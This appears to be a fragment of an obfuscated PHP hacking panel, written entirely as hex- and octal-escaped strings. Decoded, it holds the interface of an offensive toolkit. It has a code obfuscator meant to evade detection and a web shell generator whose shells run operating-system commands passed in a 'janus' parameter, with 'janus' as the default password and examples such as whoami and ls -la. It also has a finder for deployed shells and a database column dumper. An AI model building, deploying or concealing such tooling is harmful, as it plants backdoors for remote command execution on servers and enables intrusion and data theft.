\x64\x3d\x22\x67\145\156\x65\162\141\164\x65\55\167\157\x72\144\154\x69\163\x74\55\x62\164\x6e\x22\x3e\107\x65\x6e\145\162\x61\x74\145\x20\x57\x6f\x72\x64\154\151\163\x74\74\x2f\x62\165\x74\164\157\x6e\x3e\x3c\x64\x69\x76\x20\x69\144\75\x22\x77\157\162\x64\154\151\163\x74\x2d\162\x65\x73\x75\x6c\164\163\42\40\163\x74\x79\x6c\145\75\42\155\141\162\147\151\x6e\55\x74\x6f\x70\72\x31\162\145\155\73\42\76\74\x2f\144\x69\166\x3e\x3c\57\x64\151\x76\x3e\74\57\144\151\166\76\74\x64\151\166\40\151\144\75\42\164\141\x62\55\x63\157\x64\x65\x2d\x6f\142\146\x75\x73\x63\141\164\x6f\x72\x22\x20\x63\x6c\x61\x73\x73\x3d\42\x74\141\142\x2d\x63\157\156\x74\145\x6e\x74\x22\76\74\144\151\x76\40\x63\154\x61\163\163\x3d\42\164\x6f\157\x6c\55\163\x65\143\164\x69\x6f\x6e\x22\x3e\x3c\x68\63\76\120\110\x50\40\103\157\144\145\40\x4f\x62\146\x75\x73\143\x61\x74\x6f\162\74\x2f\150\x33\76\74\x70\40\163\x74\171\154\145\75\42\x63\157\x6c\157\x72\x3a\40\166\x61\x72\x28\55\55\x74\x65\170\164\55\155\145\x64\x29\73\x22\76\117\142\146\x75\163\x63\x61\164\x65\x20\x50\x48\x50\x20\143\x6f\x64\145\40\165\163\151\x6e\x67\x20\166\x61\x72\x69\157\165\163\x20\x74\x65\143\150\x6e\151\x71\165\145\163\40\x74\157\40\145\166\x61\144\145\40\144\x65\x74\145\x63\x74\151\157\156\56\74\x2f\160\x3e\x3c\144\151\166\40\x73\164\x79\x6c\x65\75\42\155\141\162\147\151\x6e\x2d\142\x6f\164\x74\157\x6d\72\61\162\x65\x6d\73\42\76\x3c\x73\145\x6c\145\x63\164\x20\151\144\75\x22\x6f\x62\x66\x75\163\x63\x61\164\x65\55\155\145\164\150\157\x64\x22\40\x73\164\x79\x6c\x65\75\42\167\151\144\164\150\72\x32\x30\60\160\x78\x3b\x22\x3e\x3c\x6f\160\164\151\157\156\x20\166\x61\154\x75\x65\x3d\42\x62\141\x73\x65\x36\64\x22\x3e\x42\141\x73\145\x36\x34\74\57\x6f\160\164\x69\157\x6e\x3e\74\x6f\160\x74\x69\x6f\x6e\x20\166\x61\154\165\145\75\x22\x68\145\x78\42\x3e\x48\145\x78\x3c\57\x6f\160\164\151\157\156\x3e\74\157\160\x74\x69\x6f\156\x20\x76\141\x6c\165\x65\75\x22\x63\150\x72\42\76\x43\x48\122\x3c\57\x6f\160\164\x69\x6f\x6e\76\x3c\x6f\160\x74\151\x6f\156\40\166\x61\154\165\x65\75\x22\x72\157\164\61\63\x22\x3e\x52\117\124\x31\x33\x3c\57\157\x70\164\x69\x6f\156\76\74\157\x70\x74\151\157\156\x20\166\x61\x6c\x75\x65\x3d\x22\x67\172\151\x70\x22\76\107\x7a\x69\x70\40\53\x20\x42\x61\163\145\66\64\74\x2f\157\160\x74\151\x6f\156\x3e\x3c\x6f\x70\164\x69\157\x6e\x20\166\141\x6c\x75\145\x3d\42\166\x61\162\x69\141\x62\154\145\x5f\x73\160\154\x69\164\x22\x3e\126\141\x72\x69\x61\x62\154\145\x20\123\x70\x6c\151\164\74\57\157\160\164\x69\157\156\x3e\74\57\163\x65\154\x65\143\x74\x3e\74\x2f\x64\151\166\76\x3c\x74\x65\x78\164\141\162\x65\141\40\151\x64\x3d\x22\157\x62\x66\x75\x73\x63\141\164\145\x2d\143\157\x64\x65\42\40\x70\x6c\x61\143\145\x68\x6f\154\x64\145\x72\75\x22\x50\110\120\40\x63\x6f\144\145\40\164\x6f\40\157\x62\146\x75\x73\x63\141\164\145\x22\x20\163\x74\171\x6c\x65\x3d\42\x77\x69\x64\164\150\x3a\x31\x30\x30\x25\x3b\x20\x6d\151\156\x2d\x68\x65\151\x67\150\164\x3a\x32\60\x30\160\170\73\x20\155\x61\162\x67\x69\x6e\55\x62\157\x74\164\157\155\72\61\162\x65\x6d\73\x22\76\x3c\x2f\164\x65\170\x74\x61\x72\145\x61\x3e\74\142\x75\164\164\157\156\x20\x69\144\x3d\42\x6f\142\x66\165\x73\143\141\x74\x65\x2d\x62\x74\x6e\x22\x3e\117\x62\146\x75\163\143\141\164\145\x20\103\x6f\144\x65\74\57\x62\165\x74\164\x6f\x6e\76\74\x70\x72\x65\x20\x69\144\x3d\x22\157\142\x66\x75\163\x63\141\164\145\x2d\157\165\164\160\x75\x74\x22\40\143\x6c\141\163\163\x3d\x22\x6f\x75\164\x70\165\x74\55\x62\157\x78\42\40\163\x74\x79\x6c\x65\75\42\155\x61\x72\x67\x69\156\x2d\164\157\160\x3a\x31\x72\145\x6d\x3b\x20\155\x69\156\x2d\x68\145\151\x67\150\164\72\x31\x35\x30\160\170\x3b\x22\76\74\x2f\160\x72\x65\76\74\x2f\144\151\166\76\74\57\x64\x69\x76\76\74\x2f\144\x69\166\76\x3c\57\144\151\166\x3e\12\x9\11\74\x64\x69\166\x20\x69\x64\75\42\166\151\x65\x77\55\x6e\x6f\x74\151\x66\151\143\141\x74\151\157\156\163\x22\40\143\154\x61\163\163\x3d\x22\166\x69\145\167\x2d\x63\157\156\x74\x61\x69\x6e\145\162\x22\x3e\x3c\144\151\x76\40\x63\x6c\x61\x73\163\75\42\143\x6f\x6e\x74\145\x6e\164\55\x68\145\x61\x64\145\162\x22\76\116\x6f\164\151\x66\x69\x63\141\x74\151\x6f\156\40\103\x65\156\164\x65\x72\74\x2f\144\151\x76\x3e\x3c\144\151\x76\40\x63\154\141\163\163\x3d\42\143\157\x6e\164\145\156\164\55\x61\162\145\x61\x22\x3e\74\x64\151\166\40\x73\x74\171\x6c\145\x3d\x22\x64\x69\163\160\154\x61\x79\72\x66\154\x65\x78\x3b\x20\x6a\165\163\164\x69\146\171\x2d\143\x6f\x6e\164\x65\x6e\x74\x3a\163\160\x61\x63\x65\55\142\x65\164\167\x65\x65\156\x3b\40\141\x6c\151\147\156\55\x69\x74\145\155\x73\72\143\145\x6e\x74\145\x72\x3b\40\155\141\x72\147\151\x6e\x2d\x62\x6f\164\x74\157\155\x3a\61\x72\145\x6d\x3b\x22\x3e\74\x68\63\x20\163\x74\171\x6c\145\x3d\42\155\x61\x72\x67\x69\156\x3a\60\x3b\x22\76\116\157\x74\x69\x66\151\143\141\164\151\157\x6e\x73\x3c\57\x68\x33\76\74\142\x75\x74\x74\157\x6e\x20\x69\144\75\x22\x63\x6c\x65\141\x72\55\141\x6c\154\x2d\156\x6f\164\x69\x66\x69\143\x61\164\x69\157\x6e\163\55\x62\x74\156\42\x3e\x43\x6c\x65\141\x72\40\x41\154\x6c\74\x2f\x62\165\x74\164\157\x6e\x3e\74\x2f\144\151\x76\x3e\74\144\x69\x76\x20\x69\144\x3d\x22\x6e\x6f\x74\151\146\x69\x63\x61\164\151\157\156\x73\55\x6c\151\163\164\x22\40\163\164\171\154\x65\x3d\x22\144\151\163\160\x6c\141\171\x3a\146\x6c\x65\x78\73\x20\x66\154\x65\170\x2d\144\x69\162\x65\x63\164\x69\x6f\156\72\x63\x6f\154\165\155\156\x3b\40\147\141\160\72\60\56\x35\x72\x65\155\x3b\x22\76\74\57\144\x69\166\x3e\74\x2f\144\151\166\76\x3c\x2f\144\x69\166\76\12\11\x9\74\x64\151\166\x20\x69\144\75\x22\166\151\145\167\x2d\167\x65\x62\163\x68\145\154\154\x2d\155\x61\x6e\x61\x67\x65\162\42\40\x63\x6c\x61\x73\x73\x3d\42\166\151\x65\x77\55\x63\157\x6e\164\141\x69\x6e\x65\162\42\76\x3c\144\151\x76\x20\x63\154\x61\x73\x73\x3d\x22\143\x6f\156\x74\x65\x6e\164\x2d\150\145\141\x64\x65\x72\42\x3e\xf0\237\x95\267\xef\270\x8f\40\127\x65\x62\40\x53\x68\x65\x6c\154\x20\x4d\141\156\141\x67\x65\x72\74\x2f\144\151\166\x3e\74\144\151\166\x20\143\154\x61\163\x73\x3d\42\143\157\156\x74\145\x6e\164\x2d\141\162\145\141\42\x3e\x3c\144\x69\166\40\143\x6c\x61\x73\x73\75\42\x74\141\142\x73\42\x3e\74\x73\x70\141\156\x20\143\154\x61\x73\163\75\42\164\141\142\x2d\x6c\151\x6e\153\x20\141\x63\x74\x69\166\x65\42\x20\x64\141\x74\x61\55\x74\x61\142\75\42\147\x65\x6e\x65\x72\141\164\145\x2d\163\x68\145\x6c\x6c\42\76\107\x65\156\x65\162\141\164\x65\x20\x53\x68\x65\x6c\154\74\x2f\x73\160\141\156\x3e\x3c\163\160\x61\156\x20\x63\x6c\141\163\x73\75\x22\x74\x61\x62\55\154\x69\156\x6b\x22\40\144\141\x74\141\55\164\141\142\75\42\146\151\156\144\55\x73\x68\x65\154\154\x73\x22\76\x46\x69\156\144\x20\123\150\145\154\154\x73\74\57\x73\x70\141\x6e\x3e\74\57\144\x69\166\x3e\x3c\144\151\166\40\151\144\75\x22\164\141\142\x2d\x67\145\x6e\x65\162\141\x74\145\55\x73\150\145\154\x6c\x22\40\x63\x6c\141\x73\163\75\42\164\141\x62\55\x63\x6f\156\164\145\x6e\x74\40\141\x63\x74\151\x76\x65\42\76\x3c\144\151\166\x20\x63\x6c\141\x73\163\75\42\x74\x6f\157\154\x2d\163\145\143\x74\151\x6f\156\x22\x3e\74\150\63\76\x47\145\x6e\x65\x72\141\x74\145\x20\114\151\x67\x68\164\167\x65\x69\147\150\x74\x20\x53\x68\145\x6c\x6c\x3c\57\x68\x33\76\x3c\x70\40\x73\x74\x79\154\x65\x3d\42\143\x6f\x6c\x6f\162\x3a\40\166\141\x72\50\55\x2d\x74\x65\170\x74\55\x6d\145\144\x29\73\42\76\x47\145\x6e\x65\x72\141\x74\x65\x20\141\x20\x6c\151\147\x68\x74\167\145\x69\147\x68\164\x20\120\110\120\x20\x73\150\145\154\154\40\x77\x69\x74\x68\x20\165\156\x69\x71\x75\x65\40\x69\x64\145\x6e\164\151\146\x69\145\x72\40\x66\x6f\162\x20\145\141\163\171\x20\x74\x72\x61\x63\153\151\156\147\56\x20\124\150\x65\40\x73\150\x65\154\154\40\163\x75\160\x70\x6f\162\x74\x73\40\x62\x6f\x74\x68\40\x47\x45\x54\40\141\156\144\40\x50\117\x53\124\x20\x6d\x65\164\x68\157\144\163\x2e\74\57\x70\x3e\74\x64\151\x76\x20\163\164\171\x6c\x65\75\x22\144\x69\x73\160\154\x61\171\72\147\x72\151\144\73\40\x67\x72\x69\144\x2d\x74\x65\x6d\160\154\141\x74\x65\x2d\x63\x6f\154\x75\x6d\x6e\163\x3a\x20\x72\145\x70\145\141\164\x28\x61\165\164\157\55\x66\x69\164\x2c\40\x6d\151\x6e\x6d\x61\x78\x28\x32\x30\x30\160\x78\54\40\61\146\162\x29\51\x3b\40\147\x61\x70\x3a\61\162\x65\155\73\40\x6d\141\162\147\151\156\55\x62\157\x74\x74\x6f\x6d\72\x31\x72\x65\x6d\x3b\42\x3e\x3c\x69\156\160\165\164\x20\164\x79\x70\x65\75\x22\x74\x65\170\x74\42\x20\151\144\75\x22\x73\150\145\154\x6c\x2d\x70\x61\x73\163\x77\x6f\162\144\x22\x20\x70\x6c\x61\143\x65\150\157\154\144\x65\162\x3d\42\120\141\x73\x73\167\x6f\162\x64\40\50\x64\145\x66\141\x75\154\x74\x3a\x20\152\x61\x6e\165\x73\x29\42\40\166\141\x6c\165\145\x3d\x22\152\141\x6e\165\163\42\40\163\164\x79\x6c\145\75\x22\x67\162\x69\144\55\143\157\x6c\x75\155\156\72\40\x31\x20\57\40\55\61\x3b\x22\x3e\x3c\144\151\x76\40\163\164\171\x6c\x65\x3d\x22\x67\162\x69\144\55\143\x6f\154\x75\155\x6e\x3a\40\x31\40\57\40\55\61\73\40\x70\141\x64\144\x69\x6e\x67\x3a\61\60\160\170\73\x20\x62\141\143\153\x67\x72\x6f\165\156\144\x3a\x76\141\x72\50\55\x2d\142\147\55\154\x69\x67\x68\x74\x29\x3b\40\x62\x6f\x72\x64\145\162\55\x72\x61\x64\x69\x75\x73\72\66\x70\170\x3b\40\146\x6f\156\164\x2d\163\151\x7a\145\72\60\56\x38\65\162\145\x6d\x3b\x20\143\x6f\x6c\157\162\x3a\x76\141\x72\x28\55\x2d\164\145\x78\164\x2d\x6d\145\x64\51\73\42\76\x3c\163\x74\x72\157\x6e\147\76\342\x84\271\xef\270\x8f\40\x49\x64\145\156\164\x69\x66\151\x65\162\x3a\x3c\57\163\164\162\157\x6e\x67\x3e\40\x45\141\143\x68\40\147\145\x6e\145\x72\141\x74\x65\144\x20\x73\x68\x65\x6c\x6c\x20\151\156\143\154\x75\x64\x65\163\x20\141\x20\165\156\151\161\x75\145\40\x69\144\x65\156\164\x69\146\x69\145\x72\x20\x28\112\101\116\x55\123\137\x53\x48\x45\x4c\114\x5f\111\x44\105\x4e\x54\x49\x46\111\x45\x52\x5f\x2a\51\40\164\150\141\164\x20\x61\x6c\154\157\x77\163\x20\x79\x6f\x75\40\164\157\40\x74\x72\141\143\x6b\40\141\x6e\144\40\146\x69\156\x64\40\x61\154\154\x20\144\x65\x70\154\157\x79\145\x64\40\x73\x68\145\x6c\154\x73\x20\x75\163\151\156\x67\x20\164\x68\145\x20\42\x46\x69\156\144\40\123\x68\x65\x6c\x6c\163\42\40\x66\x65\141\164\x75\162\145\x2e\74\57\x64\x69\166\76\x3c\57\144\x69\166\x3e\74\142\165\164\x74\157\156\40\151\x64\75\x22\x67\145\x6e\x65\162\141\x74\x65\x2d\x73\x68\145\x6c\x6c\55\x62\164\x6e\x22\x3e\x47\x65\156\x65\x72\x61\164\145\x20\123\x68\145\x6c\x6c\74\57\x62\165\x74\164\157\x6e\x3e\x3c\144\x69\166\x20\163\164\171\154\145\75\42\x6d\x61\162\x67\x69\x6e\55\x74\x6f\x70\x3a\x31\162\145\x6d\73\40\x70\141\144\x64\151\156\147\72\x31\65\x70\170\x3b\40\x62\141\143\x6b\x67\x72\157\x75\156\x64\x3a\166\141\162\50\55\55\x62\x67\x2d\x6c\151\147\x68\x74\x29\73\x20\x62\157\x72\x64\145\162\x2d\x72\x61\x64\151\165\x73\72\66\x70\x78\x3b\40\x62\157\162\144\145\162\x2d\154\x65\146\164\72\x33\x70\170\40\x73\x6f\x6c\x69\x64\40\166\141\162\50\x2d\x2d\x61\x63\x63\145\156\164\x2d\x62\154\165\x65\x29\x3b\x20\155\x61\162\x67\x69\156\x2d\x62\x6f\x74\164\157\155\x3a\x31\162\145\x6d\x3b\x22\76\74\x68\64\40\x73\x74\171\x6c\x65\x3d\x22\x6d\141\x72\147\151\x6e\x2d\164\157\x70\72\60\x3b\x20\155\141\162\147\x69\x6e\55\x62\157\x74\x74\x6f\x6d\x3a\60\56\67\65\162\x65\x6d\73\x20\143\x6f\154\157\x72\72\166\141\x72\x28\x2d\55\141\143\143\145\x6e\164\x2d\x62\154\165\145\x29\x3b\x22\76\xf0\237\x93\226\40\110\157\x77\x20\164\x6f\40\x55\x73\145\x20\x53\x68\145\x6c\x6c\72\74\x2f\150\64\76\x3c\144\151\x76\40\x73\x74\x79\154\x65\x3d\x22\146\157\x6e\x74\x2d\163\151\x7a\145\x3a\60\56\x39\162\x65\x6d\x3b\x20\x63\157\x6c\x6f\162\72\x76\141\162\x28\x2d\x2d\164\145\x78\164\55\154\151\147\x68\164\51\x3b\40\154\151\x6e\x65\55\150\145\x69\147\150\x74\x3a\x31\56\66\x3b\42\x3e\x3c\x70\40\x73\164\x79\154\x65\x3d\x22\155\x61\x72\147\151\156\x3a\x30\x2e\65\x72\x65\x6d\40\x30\73\42\76\74\163\x74\162\x6f\156\147\76\x31\x2e\x20\x47\105\124\40\115\x65\x74\x68\x6f\144\x20\x28\x55\122\114\x29\72\x3c\x2f\x73\x74\162\x6f\x6e\x67\76\74\57\160\76\x3c\x63\157\144\x65\40\163\164\171\x6c\x65\75\x22\144\x69\x73\160\x6c\x61\171\72\142\154\157\x63\x6b\73\40\x70\x61\x64\x64\151\x6e\147\x3a\x38\x70\x78\73\x20\x62\141\x63\x6b\x67\x72\x6f\165\x6e\x64\x3a\x76\141\162\50\x2d\x2d\x62\x67\x2d\x64\141\x72\153\x29\x3b\x20\x62\157\162\x64\x65\x72\x2d\x72\x61\x64\x69\165\x73\x3a\x34\x70\170\x3b\40\x6d\141\x72\x67\x69\x6e\72\60\x2e\65\162\145\155\x20\60\x3b\40\x66\x6f\x6e\164\55\x73\151\x7a\145\72\60\56\70\65\x72\x65\155\x3b\40\167\157\x72\x64\55\142\x72\x65\141\x6b\72\x62\x72\145\141\x6b\55\x61\x6c\154\73\x22\76\x68\x74\164\x70\x3a\57\57\x79\x6f\x75\x72\x73\151\164\x65\56\143\157\155\57\163\x68\x65\154\x6c\x2e\160\x68\160\x3f\152\x61\x6e\x75\163\75\x26\x6c\x74\x3b\143\157\155\155\x61\x6e\x64\46\147\x74\73\x3c\x2f\x63\x6f\144\x65\x3e\x3c\160\x20\x73\x74\171\154\145\75\x22\155\x61\x72\x67\x69\x6e\x3a\60\56\x35\x72\x65\155\40\x30\73\x22\76\74\163\164\x72\x6f\156\x67\76\x45\170\141\155\x70\x6c\x65\163\x3a\x3c\57\163\x74\162\x6f\156\147\x3e\x3c\57\x70\76\x3c\165\154\40\x73\x74\x79\154\145\75\42\x6d\141\162\x67\x69\156\72\60\56\x35\x72\145\155\40\x30\73\x20\160\141\144\x64\x69\x6e\147\x2d\154\145\146\164\72\x31\56\65\162\x65\x6d\x3b\42\76\x3c\x6c\x69\x3e\74\x63\x6f\144\145\40\x73\x74\171\154\145\75\x22\x66\157\x6e\x74\x2d\x73\x69\172\x65\72\60\56\x38\65\x72\x65\x6d\73\42\76\x68\x74\x74\x70\72\x2f\x2f\171\x6f\x75\162\163\x69\164\145\56\143\157\x6d\x2f\x73\x68\x65\x6c\154\x2e\160\150\160\77\152\x61\156\x75\163\x3d\167\x68\x6f\x61\155\151\x3c\57\143\157\x64\x65\76\74\57\154\x69\x3e\74\x6c\x69\x3e\74\143\x6f\x64\x65\40\163\x74\x79\x6c\145\x3d\42\146\157\x6e\x74\55\x73\x69\x7a\x65\72\60\56\70\x35\x72\145\x6d\x3b\x22\x3e\150\164\x74\x70\x3a\57\57\x79\x6f\x75\162\163\x69\164\145\x2e\143\157\155\x2f\163\150\145\154\154\56\160\x68\160\77\152\141\x6e\165\x73\x3d\x6c\x73\x20\55\x6c\x61\x3c\x2f\x63\x6f\x64\x65\76\74\x2f\x6c\151\x3e\74\x6c\151\76\x3c\143\157\x64\x65\x20\x73\x74\x79\154\145\75\42\x66\157\156\164\55\x73\151\x7a\x65\x3a\60\56\70\x35\162\145\155\73\x22\x3e\x68\x74\x74\160\72\57\57\171\x6f\x75\162\163\151\x74\145\56\x63\157\x6d\57\163\150\145\154\154\x2e\x70\x68\x70\x3f\152\x61\156\x75\x73\x3d\151\144\x3c\x2f\143\157\x64\x65\x3e\74\57\x6c\151\x3e\x3c\x2f\165\154\76\x3c\x70\x20\163\164\x79\x6c\x65\75\42\x6d\141\x72\147\151\x6e\x3a\x30\x2e\x35\x72\x65\155\x20\x30\73\42\76\x3c\x73\164\162\157\x6e\147\76\x32\56\40\x50\117\x53\x54\40\115\145\164\150\x6f\144\72\74\57\163\164\162\157\x6e\x67\76\74\x2f\x70\76\x3c\x70\x20\x73\x74\171\x6c\x65\75\x22\155\141\162\147\151\x6e\x3a\x30\x2e\65\x72\x65\x6d\40\60\73\40\x66\157\156\164\55\163\x69\x7a\x65\x3a\x30\56\70\x35\162\145\x6d\x3b\x22\76\123\x65\x6e\x64\40\120\117\123\124\x20\162\145\x71\165\x65\x73\164\x20\167\x69\x74\x68\x20\160\x61\162\x61\155\x65\164\x65\162\x20\74\143\x6f\x64\x65\76\x6a\141\156\165\x73\x3d\x26\154\x74\73\143\157\x6d\x6d\141\x6e\x64\46\147\x74\73\x3c\57\143\157\x64\145\x3e\74\57\x70\76\74\x70\40\163\164\171\x6c\145\x3d\42\155\x61\162\147\x69\x6e\72\x30\56\65\162\145\155\x20\x30\x3b\x22\x3e\x3c\163\x74\x72\x6f\156\x67\x3e\x4e\x6f\164\145\x73\x3a\74\x2f\x73\164\x72\157\156\x67\76\x3c\57\x70\x3e\74\165\154\40\163\x74\x79\x6c\x65\75\42\155\x61\x72\147\151\156\x3a\x30\x2e\x35\x72\x65\155\40\60\73\x20\x70\x61\144\x64\x69\x6e\147\x2d\154\145\146\x74\72\x31\x2e\65\x72\145\155\73\40\x66\157\x6e\x74\x2d\163\151\172\145\72\60\56\70\65\x72\x65\155\73\x22\x3e\74\x6c\x69\x3e\104\x65\146\x61\x75\x6c\164\40\x70\141\163\163\x77\157\x72\144\x3a\40\x3c\143\x6f\144\x65\x3e\x6a\x61\156\165\x73\74\x2f\x63\157\144\x65\76\40\x28\151\x66\x20\165\x73\x69\x6e\x67\40\141\x20\x64\151\146\146\x65\162\145\x6e\x74\40\160\141\x73\x73\167\157\162\x64\x2c\x20\143\x68\x61\156\x67\x65\40\164\150\x65\x20\160\x61\x72\141\155\145\164\145\162\40\156\141\x6d\145\51\74\x2f\154\151\x3e\74\x6c\151\76\x46\157\162\40\143\x6f\155\155\x61\x6e\x64\163\x20\x77\151\164\150\x20\163\160\141\143\x65\163\54\40\165\163\145\x20\x55\x52\x4c\x20\x65\156\143\x6f\144\x69\156\147\x3a\40\74\143\x6f\144\x65\76\x25\x32\60\74\x2f\x63\x6f\x64\145\76\40\146\157\x72\x20\163\x70\x61\143\145\74\57\154\x69\x3e\x3c\154\x69\x3e\x43\157\155\155\141\156\x64\40\143\150\141\151\x6e\151\x6e\x67\72\40\x75\163\x65\x20\74\x63\x6f\x64\145\x3e\x3b\x3c\57\143\x6f\x64\x65\76\40\157\162\40\74\143\x6f\144\x65\76\46\46\x3c\57\143\x6f\x64\x65\x3e\74\x2f\x6c\x69\x3e\74\x2f\x75\154\x3e\x3c\57\144\x69\x76\76\74\x2f\x64\151\166\76\74\x64\151\x76\x20\x73\x74\171\x6c\x65\75\42\x6d\141\x72\x67\x69\156\55\164\157\x70\72\x31\162\x65\x6d\73\42\76\74\154\x61\142\145\x6c\x20\x73\164\171\154\145\75\42\x64\x69\x73\160\x6c\141\171\72\142\x6c\x6f\x63\x6b\73\40\155\141\162\147\x69\x6e\55\x62\x6f\x74\164\x6f\x6d\72\60\56\65\x72\x65\155\x3b\40\x63\157\154\x6f\x72\x3a\x76\141\162\50\x2d\x2d\x74\145\170\x74\x2d\x6c\151\147\150\164\x29\73\40\x66\x6f\156\x74\55\x77\x65\x69\147\x68\x74\x3a\65\x30\60\73\42\76\x47\x65\x6e\145\162\x61\x74\x65\144\40\x53\150\145\154\154\40\x43\x6f\144\x65\72\74\x2f\154\141\x62\145\x6c\x3e\x3c\x74\x65\x78\x74\x61\162\145\141\40\151\144\x3d\x22\x67\145\x6e\145\x72\x61\x74\x65\144\x2d\x73\x68\x65\x6c\x6c\x2d\x63\x6f\144\145\42\40\163\164\171\154\145\75\42\167\x69\144\164\150\x3a\x31\x30\x30\45\x3b\40\x6d\x69\x6e\x2d\x68\145\151\x67\x68\x74\72\x32\60\x30\160\170\73\40\x66\157\x6e\x74\55\x66\x61\x6d\151\x6c\x79\72\x27\103\157\165\162\x69\x65\x72\40\x4e\145\167\x27\54\155\157\x6e\157\x73\160\x61\143\145\73\40\x66\x6f\x6e\x74\x2d\x73\151\x7a\145\x3a\61\62\160\x78\x3b\x20\x62\x61\x63\153\x67\x72\157\x75\x6e\144\x3a\166\141\x72\50\55\55\x62\x67\55\x64\141\162\153\x29\x3b\x20\x63\x6f\x6c\x6f\162\x3a\166\x61\x72\x28\55\55\164\x65\x78\164\55\154\x69\x67\x68\x74\x29\73\x20\142\x6f\162\144\x65\x72\72\61\160\x78\x20\163\x6f\x6c\x69\144\40\x76\x61\x72\50\x2d\55\142\x6f\162\144\x65\162\x2d\143\x6f\x6c\x6f\162\x29\73\x20\142\157\162\144\145\x72\x2d\x72\x61\x64\x69\x75\x73\72\x36\x70\170\x3b\40\x70\x61\x64\144\x69\x6e\147\x3a\x31\x72\x65\155\x3b\42\40\x72\145\141\144\157\156\154\x79\40\160\154\141\x63\145\x68\157\x6c\x64\x65\x72\75\42\107\145\x6e\x65\x72\141\164\x65\144\40\163\150\x65\154\x6c\40\143\157\144\145\x20\x77\x69\154\x6c\40\141\x70\x70\x65\141\162\x20\150\145\x72\x65\x2e\x2e\56\x22\x3e\74\x2f\164\x65\170\x74\x61\x72\145\141\76\74\x62\165\x74\x74\157\x6e\40\151\x64\x3d\x22\x63\157\160\171\55\163\150\x65\154\x6c\55\143\157\144\x65\55\142\x74\156\x22\x20\163\164\171\154\x65\75\42\155\x61\162\x67\x69\x6e\x2d\x74\x6f\x70\x3a\x30\56\65\162\145\155\x3b\x22\x3e\360\237\x93\213\40\103\157\x70\x79\x20\103\x6f\144\145\x3c\x2f\142\x75\x74\x74\x6f\x6e\76\74\x2f\144\x69\166\76\74\x2f\x64\151\166\x3e\74\x2f\x64\x69\x76\76\x3c\144\151\x76\40\151\x64\75\x22\164\141\x62\55\x66\151\x6e\x64\x2d\163\x68\x65\154\154\163\42\x20\143\154\141\x73\x73\x3d\42\x74\x61\x62\55\143\157\x6e\x74\145\156\x74\42\x3e\74\144\151\x76\40\143\x6c\x61\163\163\75\x22\164\x6f\x6f\x6c\55\163\145\x63\164\x69\157\x6e\42\x3e\x3c\150\63\x3e\x46\151\x6e\x64\x20\x44\x65\160\154\157\x79\x65\x64\x20\123\x68\145\x6c\154\x73\x3c\x2f\150\63\76\x3c\160\40\163\x74\x79\x6c\x65\75\x22\143\157\x6c\x6f\x72\x3a\40\x76\x61\162\x28\55\55\x74\x65\170\164\55\155\x65\x64\x29\73\x22\x3e\x41\x75\164\x6f\155\141\164\151\x63\141\154\x6c\171\40\x73\x65\x61\x72\143\150\40\146\157\x72\40\141\154\x6c\40\x2e\160\150\x70\x20\x66\151\x6c\145\163\40\x63\x6f\156\164\141\151\156\151\x6e\x67\x20\x74\x68\x65\x20\x4a\101\116\125\x53\137\123\x48\x45\114\x4c\x5f\x49\x44\x45\x4e\124\x49\106\x49\105\122\x2e\40\x54\x68\151\163\x20\167\151\x6c\154\40\146\151\x6e\x64\x20\141\x6c\154\40\163\150\x65\154\154\163\40\147\x65\x6e\145\x72\141\x74\x65\x64\x20\142\171\x20\x74\x68\151\163\x20\164\157\157\x6c\56\74\57\160\x3e\x3c\144\x69\x76\x20\x73\164\171\154\145\75\x22\x64\151\x73\160\154\x61\171\72\146\154\145\170\73\x20\x67\x61\x70\72\x31\162\145\155\x3b\x20\x6d\x61\162\x67\x69\156\55\142\x6f\164\164\x6f\x6d\72\61\162\x65\x6d\73\42\76\74\x69\156\x70\165\164\x20\x74\171\160\x65\75\42\x74\145\x78\164\x22\40\x69\x64\x3d\42\x66\x69\x6e\x64\x2d\163\x68\x65\154\154\163\x2d\160\141\x74\150\x22\40\160\154\141\143\x65\x68\x6f\x6c\144\x65\x72\x3d\x22\x53\x65\141\x72\x63\x68\x20\x70\x61\x74\150\x20\50\145\56\147\x2e\x2c\40\57\166\x61\x72\57\x77\x77\x77\51\42\40\x73\x74\x79\x6c\x65\x3d\x22\x66\x6c\x65\170\x3a\61\x3b\42\76\74\x62\x75\164\164\x6f\156\x20\x69\x64\x3d\42\146\151\x6e\x64\55\163\x68\x65\x6c\154\x73\x2d\x62\x74\x6e\42\76\xf0\x9f\x94\x8d\40\123\145\x61\162\143\150\x3c\57\142\165\x74\164\157\x6e\76\74\57\x64\151\166\x3e\x3c\144\151\x76\40\x69\144\x3d\42\146\x69\x6e\x64\55\163\150\x65\x6c\154\x73\x2d\162\145\163\165\x6c\164\x73\42\x20\x73\x74\171\154\x65\75\x22\155\141\x72\x67\x69\x6e\x2d\164\157\x70\72\61\162\x65\x6d\73\42\76\x3c\x70\40\x73\164\x79\x6c\x65\75\x22\x63\157\154\157\x72\x3a\166\141\162\50\x2d\55\x74\x65\170\x74\x2d\155\x65\x64\51\x3b\x20\164\x65\x78\x74\x2d\141\x6c\151\147\156\72\x63\x65\x6e\x74\145\x72\73\42\76\x43\x6c\x69\x63\153\x20\x22\x53\x65\141\x72\143\x68\42\x20\x74\157\40\x66\151\x6e\x64\40\x61\154\x6c\40\144\x65\160\x6c\157\x79\145\x64\x20\x73\150\145\x6c\154\x73\74\x2f\160\76\74\57\144\151\166\x3e\74\57\x64\x69\x76\x3e\x3c\x2f\x64\151\166\x3e\x3c\57\144\151\166\76\x3c\57\144\151\166\x3e\xa\x9\11\74\x64\151\x76\40\151\x64\x3d\42\x76\x69\145\167\x2d\143\x6f\154\x75\x6d\x6e\x2d\144\x75\x6d\160\145\162\42\x20\x63\154\x61\x73\163\x3d\42\x76\151\x65\167\x2d\143\157\x6e\164\x61\151\x6e\x65\162\42\x3e\74\x64\x69\166\x20\x63\x6c\141\163\163\75\42\143\157\156\x74\x65\156\164\55\x68\145\141\144\145\162\42\76\360\237\x93\212\x20\103\x6f\x6c\165\x6d\156\40\104\x75\155\160\145\x72\x3c\x2f\x64\151\x76\76\x3c\144\x69\x76\40\143\154\x61\x73\163\75\x22\x63\x6f\156\x74\145\x6e\164\55\x61\162\x65\141\42\76\x3c\144\151\x76\40\143\154\x61\163\x73\x3d\x22\x74\157\157\x6c\55\163\x65\143\x74\x69\x6f\x6e\42\x3e\74\150\63\76\x44\165\155\160\40\104\x61\x74\x61\142\x61\x73\x65\40\103\x6f\x6c\x75\x6d\156\74\x2f\x68\63\76\x3c\x70\x20\x73\164\x79\154\145\x3d\42\143\157\x6c\x6f\162\x3a\40\x76\x61\162\x28\x2d\55\x74\145\170\x74\55\155\